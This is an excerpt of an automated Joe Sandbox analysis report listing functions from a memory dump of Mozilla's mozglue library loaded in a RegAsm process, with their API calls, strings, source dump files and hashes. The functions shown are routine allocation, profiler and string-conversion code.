Instruction ID: f6079b6ae7b208b62481cc9a404dd6d1917b8011c4e2a237b1ab8b06f65efc9d
Opcode Fuzzy Hash: 2dd9fdd4478367a3db52a8f8fa21b783c7defde760199d2f9d0a2ec728cee28d
Instruction Fuzzy Hash: 7051A071D452088FDB00DF68D8447EEB7F1AF5D318F44852DE8656B780E731A989C7A2

Function 6C0F0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0A72

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

moz_xmalloc.MOZGLUE(?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0AF5
free.MOZGLUE(00000000,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0B9F
free.MOZGLUE(?,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0BDB
free.MOZGLUE(00000000,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0C0A

Strings

alloc overflow, xrefs: 6C0F0C05

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 34d0aac8ab075d3b546cbd256cd4bc1e79c1df934655e018dfb3e623be5cb44a
Instruction ID: e708b8a1e1d2f7e3f3328dacfc179451629bc0b2764c4f73abc67073aa7a9c7a
Opcode Fuzzy Hash: 34d0aac8ab075d3b546cbd256cd4bc1e79c1df934655e018dfb3e623be5cb44a
Instruction Fuzzy Hash: 875190B4A08246CFDB24CF58C880B6EB3F5EF4834CF54496DC86A9B601EB71E596CB51

Function 6C15A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C15A565

Part of subcall function 6C15A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C15A4BE
Part of subcall function 6C15A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C15A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C15A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C15A6B6

Strings

0, xrefs: 6C15A5FB
z, xrefs: 6C15A6AE

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 1d6749d9c8c12b3c2d5ef2df6668cf409a262f44a06669580b46602cd2b6594f
Instruction ID: f77a65b0073743283d704feb063fc5f798364650f6ce7b7fa08adf8afaf90fe7
Opcode Fuzzy Hash: 1d6749d9c8c12b3c2d5ef2df6668cf409a262f44a06669580b46602cd2b6594f
Instruction Fuzzy Hash: F0414BB19487459FC341DF28C080A9FBBF5BF89354F808A2EF4A987690E734D559CB92

Function 6C0E78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C16008B), ref: 6C0E7B89
free.MOZGLUE(?,6C16008B), ref: 6C0E7BAC

Part of subcall function 6C0E78C0: free.MOZGLUE(?,6C16008B), ref: 6C0E7BCF

free.MOZGLUE(?,6C16008B), ref: 6C0E7BF2

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: e9e3df1437ee229f4481c3ff2953e55568b564c200d9b256f057732d309be53c
Instruction ID: bd7ded2c3fbe6ebb9d2ba82a079b980a3dfc8ea3ff06facf85853352328f3e4e
Opcode Fuzzy Hash: e9e3df1437ee229f4481c3ff2953e55568b564c200d9b256f057732d309be53c
Instruction Fuzzy Hash: F6C1B631E451288FEB248B2CCC90B9DB7F2AF49314F1503A9D51AA7BC2D731AE858F51

Function 6C129420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
__Init_thread_footer.LIBCMT ref: 6C12949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C12946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C12947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C129459

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: d9a93a204a07de45dc56a1f024686b2a35bce0069885469b29df11b4fc6a2230
Instruction ID: a17af7b45d0740a78fd9bdfa9a229db7c170a648b9e368648a4dfae2d50606b0
Opcode Fuzzy Hash: d9a93a204a07de45dc56a1f024686b2a35bce0069885469b29df11b4fc6a2230
Instruction Fuzzy Hash: AF014C3CA0410187DB00DB6FD935B653374AB0532DF048537DC0686F41E739D5A4995B

Function 6C131220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C131268
GetCurrentThreadId.KERNEL32 ref: 6C1312DA
InitializeConditionVariable.KERNEL32(?), ref: 6C13134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C13138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C131431

Part of subcall function 6C128AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5

free.MOZGLUE(?), ref: 6C13145A
free.MOZGLUE(?), ref: 6C13146C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 42695e97f4b9623f3515c76544ea4543feaae99427f667c338d8d53a29eadaf9
Instruction ID: fb573007c384d71e7be8214e1382f316524bcd490387b337963ee1a7ece55ae7
Opcode Fuzzy Hash: 42695e97f4b9623f3515c76544ea4543feaae99427f667c338d8d53a29eadaf9
Instruction Fuzzy Hash: 0161EF75A043409BDB10DF25C880BAAB7F5BFC5308F14991DE89947B12EB31E899CB82

Function 6C130F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C130F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C130F88
GetCurrentThreadId.KERNEL32 ref: 6C130FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C131067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C1310A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C13114B

Part of subcall function 6C128AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5

free.MOZGLUE(?), ref: 6C131174
free.MOZGLUE(?), ref: 6C131186

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 1a1ba82aa28ee9f7d9991a2f015e520ef80abb6c50bed14e08dbb591a7200f63
Instruction ID: 643d89b715c94d7ba2d05619c7c253fb93379eafdab1b85431c4681e0149d744
Opcode Fuzzy Hash: 1a1ba82aa28ee9f7d9991a2f015e520ef80abb6c50bed14e08dbb591a7200f63
Instruction Fuzzy Hash: 6661DD75A043409BDB10DF25C8807AAB7F6BFD6308F14991DE89D47711EB31E989CB82

Function 6C0E4B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4C63
free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4C89
free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CAC
free.MOZGLUE(?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4DD1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: d2e50d83ada1342e5de9858cb820c145985162fb8a120d9a2c37d7b97cf86fc7
Instruction ID: 68ed132b163717c598bd6bcd48b2faddd9cd536a65b4d834b1bde642cae876f9
Opcode Fuzzy Hash: d2e50d83ada1342e5de9858cb820c145985162fb8a120d9a2c37d7b97cf86fc7
Instruction Fuzzy Hash: C9518571548A409FD7348BFCD9A871AB6E1AF49328F444B1CE0A7CBFD1D735A4448B41

Function 6C0EE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C0F1999), ref: 6C0EEA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C0EEA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C0EEA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C0F1999), ref: 6C0EEA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C0F1999), ref: 6C0EEAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C0EEADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C0EEB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C0EEB27

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: b9365b2f8a665d536964b40eb3edd19a19a35b9a5d806787ac34728bce7de81f
Instruction ID: d7f16b1a57a7933e0b67ccf60092b592f12a6b6b1f9c858527ac0b437dc4ed4c
Opcode Fuzzy Hash: b9365b2f8a665d536964b40eb3edd19a19a35b9a5d806787ac34728bce7de81f
Instruction Fuzzy Hash: 8341A4B1A402199FDB14DF68DC80BAF77E4FF49258F280628E825D7794E730EA548BD1

Function 6C13D310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C13D36B
GetCurrentThreadId.KERNEL32 ref: 6C13D38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D3E1
free.MOZGLUE ref: 6C13D408

Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA

GetCurrentThreadId.KERNEL32 ref: 6C13D44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C13D472

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: 8c040543e0fbd80ba355e9d9fe167d8638701a2950cba9483c979c2d6464442e
Instruction ID: 72c140fdfcd80e9e11e0cdbba42b3731c01d564cc29e482159003e42ed6f3a78
Opcode Fuzzy Hash: 8c040543e0fbd80ba355e9d9fe167d8638701a2950cba9483c979c2d6464442e
Instruction Fuzzy Hash: B241E1B1604315CFCB10EF65C488BAEBBB5FF85318F10492DE9A697B40DB31A948CB91

Function 6C0EB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6AC

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C0EB61E), ref: 6C0EB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB79A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: e0dc4c8c9a417651578223562af7852d364c3067a648c80f996bf6b32abbdaa3
Instruction ID: f96ef19e8c98489aa7405cf97e6ab9a760938a2aa80c60f49798a661b18716f8
Opcode Fuzzy Hash: e0dc4c8c9a417651578223562af7852d364c3067a648c80f996bf6b32abbdaa3
Instruction Fuzzy Hash: 9D41D6B2D002158FCB14DF69DC807AEB7F9FB48324F250669E865E7780E731AA148BD5

Function 6C0EEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C165104), ref: 6C0EEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0EEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0EEFEC
free.MOZGLUE(?), ref: 6C0EF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0EF02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C0EF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0EF065
moz_xmalloc.MOZGLUE ref: 6C0EF072

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 57ea4fb727335d39f119c7cec5631e35b57a8f0dc243436635135de0fe2ef3ad
Instruction ID: 1f71fce984b6670904693d1dfb4da86cb7b9dfb2fd2199efb2392df6061b6f4e
Opcode Fuzzy Hash: 57ea4fb727335d39f119c7cec5631e35b57a8f0dc243436635135de0fe2ef3ad
Instruction Fuzzy Hash: A741E9B1E001159FCB08CF68D8916AE77A9FF88314B244628E825D7794EB71E915C7E1

Function 6C15B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C15B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C15B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C15B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C15B5F4
__Init_thread_footer.LIBCMT ref: 6C15B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C15B61F
std::_Facet_Register.LIBCPMT ref: 6C15B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C15B655

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 962d210efe768a926e59f9b9f5c6b9da054f401139e3c3a4fd2ac8e1163ba276
Instruction ID: d39aa0309f4624a425478f359c45c374eea1b39b9b6200429ae8f78ca5409347
Opcode Fuzzy Hash: 962d210efe768a926e59f9b9f5c6b9da054f401139e3c3a4fd2ac8e1163ba276
Instruction Fuzzy Hash: 0331E9B2B00214CBCF00DF6AC8586BEB7B5FF8A324B510525E921D7740DB34A916DF91

Function 6C0F9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C147ABE), ref: 6C0F98A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C0F9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C0F9918
free.MOZGLUE(?), ref: 6C0F9975

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 669ab53498ffd33ec6cb83979f3a8c56e15df0988d228419cb2f86697ac3cea5
Instruction ID: 3c4adfc25ccc15ca4a9b388c2dc299749aaf8ef0ea9fdd9b763aaaba27446b43
Opcode Fuzzy Hash: 669ab53498ffd33ec6cb83979f3a8c56e15df0988d228419cb2f86697ac3cea5
Instruction Fuzzy Hash: A0716A746047058FC725CF2CC480A56B7F1FF4A324B654AADDC6A8BBA0D771B886CB91

Function 6C0FB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE), ref: 6C0FB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C13CC83,?,?,?,?,?,?,?,?,?,6C13BCAE,?,?,6C12DC2C), ref: 6C0FB896

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

